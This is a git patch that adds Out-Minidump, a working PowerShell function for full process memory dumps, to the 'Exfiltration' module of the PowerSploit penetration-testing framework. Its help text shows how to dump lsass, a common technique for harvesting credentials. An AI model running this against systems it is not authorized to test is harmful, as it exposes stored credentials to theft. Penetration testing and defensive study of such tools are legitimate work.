From af04f7e52838f88069eaaad12b831a4af4a28091 Mon Sep 17 00:00:00 2001 From: Matt Graeber Date: Wed, 15 May 2013 20:54:16 -0400 Subject: Added Out-Minidump Out-Minidump writes a process dump file with all process memory to disk. This is similar to running procdump.exe with the '-ma' switch. --- Exfiltration/Exfiltration.psd1 | 3 +- Exfiltration/Out-Minidump.ps1 | 133 +++++++++++++++++++++++++++++++++++++++++ README.md | 4 ++ 3 files changed, 139 insertions(+), 1 deletion(-) create mode 100644 Exfiltration/Out-Minidump.ps1 diff --git a/Exfiltration/Exfiltration.psd1 b/Exfiltration/Exfiltration.psd1 index 7eb9aa2..7c65566 100644 --- a/Exfiltration/Exfiltration.psd1 +++ b/Exfiltration/Exfiltration.psd1 @@ -73,7 +73,8 @@ AliasesToExport = '' ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'}) # List of all files packaged with this module -FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Usage.md' +FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1', + 'Usage.md' # Private data to pass to the module specified in RootModule/ModuleToProcess # PrivateData = '' diff --git a/Exfiltration/Out-Minidump.ps1 b/Exfiltration/Out-Minidump.ps1 new file mode 100644 index 0000000..b89f3dc --- /dev/null +++ b/Exfiltration/Out-Minidump.ps1 @@ -0,0 +1,133 @@ +function Out-Minidump +{ +<# +.SYNOPSIS + + Generates a full-memory minidump of a process. + + PowerSploit Function: Out-Minidump + Author: Matthew Graeber (@mattifestation) + License: BSD 3-Clause + Required Dependencies: None + Optional Dependencies: None + +.DESCRIPTION + + Out-Minidump writes a process dump file with all process memory to disk. + This is similar to running procdump.exe with the '-ma' switch. + +.PARAMETER Id + + Specifies the process ID of the process for which a dump will be generated. + +.PARAMETER DumpFilePath + + Specifies the path where dump files will be written. By default, dump files + are written to the current working directory. Dump file names take following + form: processname_id.dmp + +.EXAMPLE + + Out-Minidump -Id 4293 + + Description + ----------- + Generate a minidump for process ID 4293. + +.EXAMPLE + + Get-Process lsass | Out-Minidump + + Description + ----------- + Generate a minidump for the lsass process. Note: To dump lsass, you must be + running from an elevated prompt. + +.EXAMPLE + + Get-Process | Out-Minidump -DumpFilePath C:\temp + + Description + ----------- + Generate a minidump of all running processes and save them to C:\temp. + +.INPUTS + + System.Diagnostics.Process + + You can pipe a process object to Out-Minidump. + +.OUTPUTS + + None + +.LINK + + http://www.exploit-monday.com/ +#> + + [CmdletBinding()] + Param ( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipelineByPropertyName = $True)] + [ValidateScript({ Get-Process -Id $_ })] + [UInt16[]] + $Id, + + [Parameter(Position = 1)] + [ValidateScript({ Test-Path $_ })] + [String] + $DumpFilePath = $PWD + ) + + BEGIN + { + $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') + $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') + $Flags = [Reflection.BindingFlags] 'NonPublic, Static' + $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) + $MiniDumpWithFullMemory = [UInt32] 2 + } + + PROCESS + { + foreach ($ProcessId in $Id) + { + $ProcessInfo = Get-Process -Id $ProcessId + $ProcessName = $ProcessInfo.Name + $ProcessHandle = $ProcessInfo.Handle + $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp" + + $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName + + $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) + + $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, + $ProcessId, + $FileStream.SafeFileHandle, + $MiniDumpWithFullMemory, + [IntPtr]::Zero, + [IntPtr]::Zero, + [IntPtr]::Zero)) + + $FileStream.Close() + + if (-not $Result) + { + $Exception = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error() + $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))" + + # Remove any partially written dump files. For example, a partial dump will be written + # in the case when 32-bit PowerShell tries to dump a 64-bit process. + Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue + + throw $ExceptionMessage + } + else + { + Write-Verbose "Success! Minidump written to $ProcessDumpPath." + } + } + } + + END {} +} \ No newline at end of file diff --git a/README.md b/README.md index 89ecb42..54f7997 100644 --- a/README.md +++ b/README.md @@ -128,6 +128,10 @@ Locates single Byte AV signatures utilizing the same method as DSplit from "clas A function that takes screenshots at a regular interval and saves them to a folder. +#### `Out-Minidump` + +Generates a full-memory minidump of a process. + ## Recon **Tools to aid in the reconnaissance phase of a penetration test.** -- cgit v1.2.3